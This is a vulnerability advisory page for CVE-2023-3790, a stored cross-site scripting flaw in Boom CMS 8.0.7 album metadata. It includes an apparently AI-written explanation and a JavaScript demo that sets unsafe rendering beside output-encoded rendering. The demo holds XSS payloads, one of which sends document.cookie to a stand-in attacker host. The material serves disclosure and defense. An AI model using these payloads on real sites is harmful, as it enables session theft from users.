VYPR
Unrated severity · NVD Advisory · Published Jul 20, 2023 · Updated Aug 2, 2024

Boom CMS assets-manager add cross site scripting

CVE-2023-3790

Description

A vulnerability has been found in Boom CMS 8.0.7 and classified as problematic. Affected by this vulnerability is the function add of the component assets-manager. The manipulation of the argument title/description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235057 was assigned to this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Boom CMS 8.0.7 suffers from a stored XSS vulnerability in the assets-manager component via the album title and description fields.

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in Boom CMS version 8.0.7 within the assets-manager component. The add function does not sanitize the title and description parameters when creating or updating an album, allowing arbitrary JavaScript to be injected and stored. The vulnerable endpoint is asset-manager/albums/[ID] [1].

Exploitation

An attacker with network access to the Boom CMS instance can send a crafted HTTP PUT request to the album endpoint with malicious payloads in the name and description JSON fields. The PoC demonstrates injection of script code that is stored with the album and executed whenever the album page is rendered, which makes this stored rather than reflected XSS. The PoC does not show an authentication step; in practice modifying albums requires a session with rights to edit album metadata, so the realistic precondition is a low-privileged authenticated account. The exploit has been publicly disclosed [1].

Impact

Successful exploitation leads to stored XSS, enabling an attacker to execute arbitrary JavaScript in the context of a victim's browser when they view the affected album. This can result in session hijacking, defacement, or theft of sensitive data. The attack is remote and does not require elevated privileges beyond the ability to modify album metadata [1].

Mitigation

As of the publication date (2023-07-20), no official patch has been released for Boom CMS 8.0.7. Users should restrict access to the assets-manager endpoints, apply input validation and output encoding for the title and description fields, or upgrade to a patched version if available. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog [1].
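The following is an added example, not Boom CMS code and not from the cited PoC. It models the round-trip described above (a PUT with attacker-controlled JSON, stored verbatim, later interpolated into the album page) and places the hardened form beside it: server-side type and length checks on the way in, and HTML entity encoding at the point of output. The request body, the "name"/"description" field names, the attacker.example host and the page template are constructed assumptions for illustration; the real endpoint path and field names come from the reference, not from this snippet.

```javascript
// Added example (not Boom CMS code). Models the album-metadata flow behind
// CVE-2023-3790: attacker-controlled JSON stored as-is and later rendered
// into HTML. Field names, template and host below are assumptions.

// Constructed PoC-style request body (not taken from the reference).
const craftedPutBody = JSON.stringify({
  name: '<img src=x onerror="alert(document.cookie)">',
  description:
    '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
});

// Minimal in-memory stand-in for the CMS album table.
const albums = new Map();

// Vulnerable update handler: stores whatever the client sent, no checks.
function updateAlbumUnsafe(id, body) {
  const data = JSON.parse(body);
  albums.set(id, { name: data.name, description: data.description });
  return albums.get(id);
}

// Vulnerable renderer: interpolates stored fields straight into markup.
function renderAlbumUnsafe(id) {
  const a = albums.get(id);
  return `<h1>${a.name}</h1><p>${a.description}</p>`;
}

// HTML entity encoding, safe for text nodes and double-quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened update handler: reject wrong types and oversized fields.
// The raw string is still stored; encoding is applied per output context.
const MAX_NAME = 200;
const MAX_DESC = 2000;
function updateAlbumSafe(id, body) {
  const data = JSON.parse(body);
  if (typeof data.name !== 'string' || typeof data.description !== 'string') {
    throw new TypeError('name and description must be strings');
  }
  if (data.name.length > MAX_NAME || data.description.length > MAX_DESC) {
    throw new RangeError('field exceeds maximum length');
  }
  albums.set(id, { name: data.name, description: data.description });
  return albums.get(id);
}

// Hardened renderer: contextual output encoding at the point of emission.
function renderAlbumSafe(id) {
  const a = albums.get(id);
  return `<h1>${escapeHtml(a.name)}</h1><p>${escapeHtml(a.description)}</p>`;
}

// Crude demo check: does the rendered HTML still carry an executable
// script tag or an inline event handler from the payload?
function containsActiveMarkup(html) {
  return /<script\b|<img\b[^>]*\bonerror=/i.test(html);
}

// Run both paths against the same crafted body and report the outcome.
function demo() {
  updateAlbumUnsafe(7, craftedPutBody);
  const unsafe = renderAlbumUnsafe(7);
  updateAlbumSafe(7, craftedPutBody);
  const safe = renderAlbumSafe(7);
  return {
    unsafe,
    safe,
    unsafeActive: containsActiveMarkup(unsafe), // true: payload is live
    safeActive: containsActiveMarkup(safe),     // false: payload is inert text
  };
}

console.log(demo());
```

Encoding at output rather than stripping on input is deliberate: the stored value stays intact for other consumers (API clients, exports), and each rendering context applies its own encoding. Input validation here only bounds type and size; it is not a substitute for the output step.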

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

No source-code context for this CVE. Mechanics is only generated when we can read the actual fix diff; without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.

References: 4

News mentions: 0 (no linked articles in our index yet)